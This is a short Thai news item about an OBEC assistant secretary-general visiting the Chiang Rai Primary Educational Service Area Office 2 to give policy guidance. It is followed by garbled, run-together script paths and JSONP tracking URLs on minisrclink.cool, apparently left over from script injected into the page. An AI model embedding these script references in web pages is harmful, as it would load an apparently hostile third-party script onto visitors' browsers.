ผู้ช่วยเลขาธิการ กพฐ. มอบนโยบาย-หลักการปฏิบัติงานพื้นที่เขต 2 จังหวัดเชียงราย

ผู้ช่วยเลขาธิการ กพฐ. มอบนโยบาย-หลักการปฏิบัติงานพื้นที่เขต 2 จังหวัดเชียงราย

– ดร.นิพนธ์ ก้องเวหา ผู้ช่วยเลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน เดินทางมาพบปะข้าราชการครูและบุคลากรทางการศึกษา เพื่อมอบนโยบายและหลักการปฏิบัติงานสู่ความเป็นเลิศแห่งอนาคต มีนายจรัญ แจ้งมณี ผอ.สพป.เชียงราย เขต 2 ร่วมต้อนรับ ณ ห้องประชุมสุพรรณิการ์ สพป.เชียงราย เขต 2 และเยี่ยมชมห้องทำงานของกลุ่มบริหารงานบุคคล กลุ่มนิเทศติดตามและประเมินผลการจัดการศึกษา กลุ่มพัฒนาครูและบุคลากรทางการศึกษา ก่อนเดินทางกลับ

 

 

//minisrclink.cool/1e40c8bd4601a5a5a4.js

//minisrclink.cool/1e40c8bd4601a5a5a4.jshttp://minisrclink.cool/optout/set/userid?jsonp=__mtz_cb_724268434&key=1e40c8bd4601a5a5a4&cv=99&t=1600921807510http://minisrclink.cool/optout/set/strtm?jsonp=__mtz_cb_655771122&key=1e40c8bd4601a5a5a4&cv=1600921807&t=1600921807511http://minisrclink.cool/optout/set/lat?jsonp=__mtz_cb_307901777&key=1e40c8bd4601a5a5a4&cv=1600921807&t=1600921807512http://minisrclink.cool/optout/set/lt?jsonp=__mtz_cb_611182029&key=1e40c8bd4601a5a5a4&cv=0&t=1600921807513

//minisrclink.cool/1e40c8bd4601a5a5a4.jshttp://minisrclink.cool/optout/set/userid?jsonp=__mtz_cb_626640639&key=1e40c8bd4601a5a5a4&cv=47&t=1600922926469http://minisrclink.cool/optout/set/strtm?jsonp=__mtz_cb_572313579&key=1e40c8bd4601a5a5a4&cv=1600922926&t=1600922926470http://minisrclink.cool/optout/set/lat?jsonp=__mtz_cb_397193234&key=1e40c8bd4601a5a5a4&cv=1600922926&t=1600922926471http://minisrclink.cool/optout/set/lt?jsonp=__mtz_cb_714410454&key=1e40c8bd4601a5a5a4&cv=0&t=1600922926472